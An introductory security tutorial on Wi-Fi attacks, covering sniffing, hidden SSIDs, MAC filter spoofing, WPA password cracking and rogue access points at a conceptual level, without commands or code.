CS Wi-Fi Attacks
WiFi is a powerful and significant component of computer security. Systems and devices can now be accessed by anybody within a signal radius rather than needing to be physically linked via cables. Numerous new products can now network thanks to WIFI.
WIFI Basics
Most people are aware that the IEEE 802.11 protocol is the source of WiFi. Other protocols, such as the following, also employ radio for signaling:
- Bluetooth, for communicating with devices we carry, typically smartphones, headphones etc.
- NFC (“Near Field Communications”), implemented in access badges and credit cards for wireless transmission of data.
- RFID (“Radio Frequency Identification”), used for access cards and other devices, for example a car which can wirelessly transmit its identifier to a toll-road system.
- ZigBee and Z-Wave, used for enterprise and home automation.
An AP (“Access Point”), a wireless base station that serves as a switch and router between clients who want to communicate, is usually used for wireless communication. Although less common, peer-to-peer communications are nonetheless feasible.
The “Service Set Identifier” (SSID) is the name of a wireless network.
Due to the fact that WIFI transmissions are omnidirectional, attackers can easily “sniff” messages for anyone sending by using an antenna. Sniffing is only the act of listening for packets visible to the network interface.
WIFI occasionally enables users to access internal programs, which raises the risk of an attack. Additionally, the firmware and administration interfaces of WIFI equipment may contain vulnerabilities that are occasionally not patched as quickly as those of other organizational assets.
WIFI Security
WIFI users can choose to
- No security
- Access list based on MAC addresses
- PSK (“Pre-Shared Key”)
- Enterprise authentication
Network cards with two main characteristics, namely:
- Monitor Mode: Makes the network card forward packets destined to all MAC addresses to the Operating System, not just its own.
- Packet Injection: The network card supports crafting packets with a different source MAC address than its own.
Open WIFI Networks
A WIFI network without a password is called an open WIFI network. There is no encryption used in communication between AP and clients; instead, each party must rely on independent encryption sources to safeguard their traffic. Although these networks are more accessible and handy for users, there are security compromises.
Sniffing packets on these networks allows an attacker to quickly see what other users are doing. These packets may include private information or just specifics on what people are doing on the network.
Hidden SSID
APs can frequently be configured to stop broadcasting the wireless network name. In order to connect to the network, clients must prove that they are aware of the SSID. Enabling secret SSID is not regarded as best practice because it exposes the network name whenever a client connects. Additionally, wherever they go, clients must now inquire about and disseminate information about the network they wish to join. The WIFI traffic of customers might then be sniffed by an attacker, who might subsequently discover more about the clients’ identities and previous network affiliations.
MAC Address Filtering
Access control based on MAC addresses is supported by certain APs. Which MAC addresses should be permitted to connect to and use the network can be specified in an allow-list that the AP can make.
This strategy is not secure. Already, an attacker is able to listen in on other systems’ network communications and monitor them. After that, note their MAC addresses and change the attacker’s own to an already-approved one. In essence, this gets around the need for MAC Address Filtering.
PSK ("Pre-Shared Key")
All that indicates that the network is password-configured is PSK. Usually, the WPA (“WIFI Protected Access”) protocol is used to implement PSK protection. While there are some older authentication protocols available, such as WEP (“Wired Equivalent Privacy”), they are no longer in use due to their high level of security flaws and ease of hacking.
There are various variations of WPA, with WPA3 being the most recent standard as of 2021. While it still has some vulnerabilities, WPA provides far greater security than WEP. An attacker using a password cracker must attempt to break into a network that supports WPA. In terms of time, this is seen as an expensive procedure if the password is somewhat strong.
If an attacker can observe (sniff) anyone whom authenticates to the network, they have enough to engage in password cracking activities. Tools like aircrack-ng (“https://www.aircrack-ng.org/”) supports cracking WIFI passwords.
Enterprise Authentication
By connecting to a centralized authentication service, enterprise access points can also facilitate client authentication based on certificates, which calls for PKI (“Public Key Infrastructure”) or enterprise credentials.
This has several advantages, particularly with regard to the idea of key management. The underlying difficulty of a PSK network is in the distribution, rotation, and revocation of passwords.
Although Enterprise Authentication offers improved key security management, it also entails a more complicated architecture and presents additional attack vectors.
Fake WIFI Access Points
It is easy for attackers to begin broadcasting networks while posing as legitimate networks. If clients display the correct SSID, they frequently join to nearby networks automatically. By forcing clients to connect to their network, attackers can use this to sniff and manipulate traffic as they see fit.
